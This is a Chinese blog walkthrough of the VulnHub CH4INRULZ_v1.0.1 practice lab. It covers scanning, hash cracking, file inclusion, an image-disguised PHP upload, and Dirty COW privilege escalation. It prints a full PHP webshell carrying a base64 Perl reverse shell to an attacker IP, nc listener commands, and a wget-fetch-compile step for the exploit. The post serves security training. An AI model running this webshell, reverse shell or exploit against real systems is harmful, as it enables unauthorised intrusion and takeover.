CH4INRULZ_v1.0.1内网渗透靶场

最新推荐文章于 2025-07-31 19:14:34 发布
原创 最新推荐文章于 2025-07-31 19:14:34 发布 · 611 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #debian #p2p

本文详述了一次针对192.168.206.146的Web渗透测试过程,包括目录扫描、漏洞利用、密码破解、文件包含、文件上传与执行、后门植入及提权等步骤。主要涉及工具如dirsearch、御剑、John the Ripper、nc等,并最终通过脏牛提权获得系统权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

nmap -T4 -A -p- 192.168.206.146
这里我们借助工具dirsearch对该网站进行目录扫描
http://192.168.206.146/development/
然后再通过御剑进行扫描
http://192.168.206.146/index.html.bak
frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
通过工具john进行一下解密 把解密结果存储到相应文件中 
cd /root
touch password.txt
nano password.txt
  # frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
john password.txt > res.log

john --show password.txt > res.log
爆破成功 成功获得账户
frank
frank!!!
成功获得账户以后 接下来我们需要登录进入后台
http://192.168.206.146/development/
之后想起来之前还有一个8011的端口开放的http的服务 我们继续访问一下该服务
http://192.168.206.146:8011
接下来尝试继续使用御剑进行网站的扫描:
http://192.168.206.146:8011/api/
经过测试    只有files_api.php可以被成功访问
http://192.168.206.146:8011/api/files_api.php
接下来猜测  这个界面可以进行文件包含 同时参数名就是file  我们可以分别尝试get型和post型两种方式对其进行文件包含
接下来我们可以尝试使用伪协议查看一个这个界面对于参数的过滤规则  也就是查看其源代码
http://192.168.206.146:8011/api/files_api.php?file=php://filter/read=convert.base64-encode/resource=files_api.php
至此逻辑思路分析清晰 接下来我们需要进行文件上传 将格式修改为jpg格式 然后修MIME为image/jpeg  之后 
<head>
  <title>franks website | simple website browser API</title>
</head>

<?php
$file = $_POST['file'];
include($file);
$get_file = $_GET['file'];

if(isset($get_file)){

echo "<b>********* HACKER DETECTED *********</b>";
echo "<p>YOUR IP IS : ".$_SERVER['REMOTE_ADDR'];
echo "</p><p>WRONG INPUT !!</p>";
break;
}

if(!isset($file)){
echo "<p>No parameter called file passed to me</p>";
echo "<p>* Note : this API don't use json , so send the file name in raw format</p>";
}
/** else{
echo strcmp($file,"/etc/passwd");
echo strlen($file);
echo strlen("/etc/passwd");
if($file == "/etc/passwd"){
        "HACKER DETECTED ..";
        }
}**/

?>
添加GIF89a 即可成功绕过
根据提示  
http://192.168.206.146/development/uploader
文件上传成功以后我们注意到url变了
接下来我们也可以通过文件包含查看相应上传的过滤情况
<?php
$target_dir = "FRANKuploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
// Check if image file is a actual image or fake image
if(isset($_POST["submit"])) {
    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
    if($check !== false) {
        echo "File is an image - " . $check["mime"] . ".";
        $uploadOk = 1;
    } else {
        echo "File is not an image.";
        $uploadOk = 0;
    }
}
// Check if file already exists
if (file_exists($target_file)) {
    echo "Sorry, file already exists.";
    $uploadOk = 0;
}
// Check file size
if ($_FILES["fileToUpload"]["size"] > 500000) {
    echo "Sorry, your file is too large.";
    $uploadOk = 0;
}
// Allow certain file formats
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
    echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";
    $uploadOk = 0;
}
// Check if $uploadOk is set to 0 by an error
if ($uploadOk == 0) {
    echo "Sorry, your file was not uploaded.";
// if everything is ok, try to upload file
} else {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to my uploads path.";
    } else {
        echo "Sorry, there was an error uploading your file.";
    }
}
?>
至此也已经成功找到了相应的上传文件所在的位置
http://192.168.206.146/development/uploader/FRANKuploads/sqzr.jpg
接下来我们可以通过文件包含来执行这个jpg
http://192.168.206.146:8011/api/files_api.php
file=/var/www/development/uploader/FRANKuploads/sqzr.jpg
接下来可以通过工具进行链接!!
介于出现了木马不合适的问题  这里我们使用另一个木马
<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.206.128";                    # 修改为你的攻击机的ip
$yourport = '8899';                        # 修改为攻击机的监听端口
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>
这里我们重新进行文件上传  图片名字叫做muma.jpg
接下来我们在相应的攻击机器中使用nc进行监听
nc -lvp 8899
然后我们直接包含然后访问这个文件
http://192.168.206.146:8011/api/files_api.php
file=/var/www/development/uploader/FRANKuploads/muma.jpg
接下来在新的kali界面中    这里使用的是其中之一的脏牛提权的exp  还有很多可以直接提权的exp这里不多赘述了
searchsploit Dirty
cp /usr/share/exploitdb/exploits/linux/local/40839.c /root/crack.c
python -m SimpleHTTPServer
目标靶机
cd /tmp
wget http://192.168.206.128:8000/crack.c
gcc -pthread crack.c -o crack -lcrypt
./crack 123
123是随便输入的一个密码
之后就成功创建了一个密码是123的用户firefart
此时断开nc重新链接一下
VulnHub靶场CH4INRULZ_v1.0.1
A_dmin的博客
10-31 3283
VulnHub靶场CH4INRULZ_v1.0.1 继续靶机实验,老样子,先打开kali和靶机 查看kali的IP地址,然后进行主机查找 使用nmap命令:nmap -sP 192.168.80.1/24
vulnhub靶机测试--CH4INRULZ_v1.0.1
ximo的博客
03-24 323
目录信息收集主机发现端口扫描目录扫描漏洞发现及利用反弹shell提权总结 信息收集 主机发现 端口扫描 四个端口。有两个开启http服务。 目录扫描 1.80端口: 2.8011端口: 漏洞发现及利用 1.先走80端口: 主页没有什么信息。 访问其他目录: /LICENSE: 无用信息。 /robots(.txt) /development: 一个登陆点,暂时搁置。 /vendor/: 目录遍历,但是没有有用的信息。 2.再看看8011端口: 只有一个目录,api: 这个API将用于与F
靶机CH4INRULZ_v1.0.1
weixin_43940853的博客
12-12 613
kali : 192.168.230.236 靶机 : 192.168.230.238 与之前的靶机不同,这次有ftp和8011,先登陆ftp看看 发现可以匿名登陆,但是进来毛都没有,一开始我想在kali上直接ftp,然后怎么搞都不行,总是提示ftp命令不存在(这个以后再说) 接着看看80没有什么发现 找不到可入手的地方(80网页先暂时放一放) 一开始有一个8011端口,我们访问一下 访问之...
记一次简单的内网靶场渗透(内附学习笔记)
wly55690的博客
07-11 412
本套[靶场](https://so.csdn.net/so/search?q=%E9%9D%B6%E5%9C%BA&spm=1001.2101.3001.7020 "靶场")来源于渗透攻击红队。大佬勿喷,请多多指教。至此,该靶场记录以全部完毕,还剩下权限维持内容,在以后的文章中会有体现。第一次写文章,可能写的不好,都是记录过程,希望大家多多担待,多多指教。
Vulnhub靶场渗透-CH4INRULZ_v1.0.1
paidx0
09-24 877
前言 靶机ip(192.168.110.135) 攻击机ip(192.168.110.127) 网络NAT模式 直接开始 信息收集 吃了上次的亏,这次就比较详细的扫了一下端口 发现 ftp服务的2.3.4版本在 msf中可以直接利用,但这是2.3.5版本,抱着试一试去搞了一下,哈哈哈没有任何作用 扫描 80 端口 扫描 8011 端口 看见 8011 的结果里有 index.html,直觉告诉我可能有备份文件 对这个解密,拿到一对账号密码 ...
靶场渗透CH4INRULZ_v1.0.1
qq_35664104的博客
09-18 568
靶机环境下载地址:[下载] ova下载下来后直接导入virtualbox即可(https://www.vulnhub.com/entry/ch4inrulz-101,247/) 好久没有来做内网渗透了,碰巧遇到一个新鲜点的靶场,就来试一下。 kali:192.168.0.100 靶机: 192.168.0.101 先扫一下端口 nmap -sS -A -p- 192.168.0.101 开启了ftp,ssh,http服务,打开他的网址上去一看,是一个未完成的个人博客。在他的网站上并没有找到什么线索,u
靶机渗透CH4INRULZ_v1.0.1(三)
Delity的博客
07-27 510
一、环境准备 一台kali,一台FourAndSix2,能相互ping通 二、靶机发现 1.主机发现,用kali扫描靶机ip地址为192.168.143.129 nmap -sP 192.168.19.0/24 2.扫描靶机开放了哪些端口 nmap -sV 192.168.143.129 可以发现靶机开放了21 22 80 8011端口,可以从ssh服务、web服务进行入手 三、渗透过程 1.通过端口扫描发现21为FTP服务,版本为vsftpd 2.3.5;22为SSH服务,版本为OpenSSH 5
靶机CH4INRULZ_V1练习报告1
08-08
靶机CH4INRULZ_V1练习报告1
Desktop.rar_CH4燃烧机理_CHEMKIN CH4_ch4 机理_chemkin燃烧机理_gri mech2.11
07-15
标题中的“Desktop.rar_CH4燃烧机理_CHEMKIN CH4_ch4 机理_chemkin燃烧机理_gri mech2.11”表明我们正在讨论一个与CH4(甲烷)燃烧机理相关的主题,具体是使用CHEMKIN软件进行分析的。CH4燃烧机理是指描述甲烷在燃烧...
CH4_ch4chemkin_chemkin_CH4_
10-03
标题 "CH4_ch4chemkin_chemkin_CH4_" 暗示了我们正在讨论与甲烷(CH₄)相关的Chemkin模型。Chemkin是一个广泛使用的化学动力学软件包,用于模拟燃烧、火焰和化学反应过程。描述中的"chemkin使用"进一步确认我们将...
[Vulnhub] CH4INRULZ_v1.0.1
weixin_63231007的博客
07-05 1052
目录信息搜集图片🐎拿shell提权下载链接:ch4inrulz: 1.0.1 ~ VulnHubnmap -sP kali-ip得到靶机ip:192.168.236.136nmap -A 192.168.236.136 看看靶机开放了哪些服务 开放21 ftp 22 ssh 80和8011 http服务访问一下试试 发现是一个类似于博客的页面 dirb 扫描一下后台看看有没有登录地址或者隐藏页面 development处需要登录,其他没有有用信息dirb http://192.168.236.136 -.
靶场练习第八天~vulnhub靶场CH4INRULZ_v1.0.1
qq_57976347的博客
02-02 1973
一、前期准备 1.靶机下载 链接: 百度网盘 请输入提取码 提取码: z37y 2.用命令ifconfig查看kali 二、信息收集 1.主机发现,使用nmap命令 具体使用方法:nmap -sP 192.168.101.0/24 2.查看该靶机开放了哪些端口 nmap -A 192.168.101.109 直接访问80端口 3.用dirb命令,扫描隐藏文件或者网址 (1)使用 dirb http://192.168.101.109,扫描到一个development..
一次简单的内网靶场渗透
weixin_46330465的博客
02-19 2093
本套靶场来源于渗透攻击红队。大佬勿喷,请多多指教。
Vulnhub靶机系列:ch4inrulz: 1.0.1
汗的博客
04-30 667
这次的靶机是vulnhub靶机:ch4inrulz: 1.0.1,还是在合天网安里做。 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权 靶机地址及相关描述 https://www.vulnhub.com/entry/ch4inrulz-101,247/ Frank has a small website and he is a smart developer wit...
vulnhub Ch4inrulz 1.0.1
分享
10-01 202
vulnhub靶机Ch4inrulz 1.0.11复现
内网渗透靶场 Vulnstack(一)
qq_47168481的博客
10-06 6024
虽然网上说这个靶场不是很难,但我自己做起来还是困难重重,很多知识不了解,搞了好几天,学到了不少,继续努力!!! 域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 从 Windows Server 2003 开始 , Active Directory 是负责维护该中央数据库的 Windows
简单的内网渗透靶场实战(tp漏洞、msf、psexec横向渗透、权限维持)
Web安全工具库
07-30 3570
​ 前言环境搭建web服务器渗透nmap探测端口thinkphp getshellthinkphp批量检测内网信息搜集内网渗透上线msf信息搜集获取凭证思路内网横向移动MS17-010尝试psexec尝试ipc连接关闭域控防火墙psexec尝试*2登录远程桌面权限维持DSRM后门日志清除 1 前言 在内网渗透的过程中思路才是最重要的,本次内网渗透的主机虽然不多,主要还是锻炼自己内网渗透的一个思想。 2环境搭建 靶场: win7(内):192.168.138...
内网渗透靶场 Vulnstack,收藏这一篇就够了
Libra1313的博客
07-31 827
对于主机的远程桌面,由于该主机处于内网,我们的攻击机相对之处于外网,无法直接与内网中的主机通信,所以我们需要用Earthworm做Socks5代理作为跳板进入内网获取更多主机。(自己的密码也可以改),因为是域,所以域管理员在域控机上修改密码,还是域成员主机上修改密码,都是可以的。虽然网上说这个靶场不是很难,但我自己做起来还是困难重重,很多知识不了解,msf与cs都搞了一下,搞了蛮久的,学到了不少,继续努力!,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。
严重性 代码 说明 项目 文件 行 禁止显示状态 错误 C2440 “=”: 无法从“const char []”转换为“LPCWSTR” ch4_1_7 D:\vs2019_\MFC\ch4_1_7\ch4_1_7\ch4_1_7.cpp 11
最新发布
08-13
原错误代码位置:ch4_1_7.cpp 第11行 假设第11行代码是: SetWindowText("我的窗口"); // 错误 修正为: SetWindowText(_T("我的窗口")); 或者如果明确知道使用宽字符函数: SetWindowTextW(L"我的窗口"); ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

宾宾有李&生活主义者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值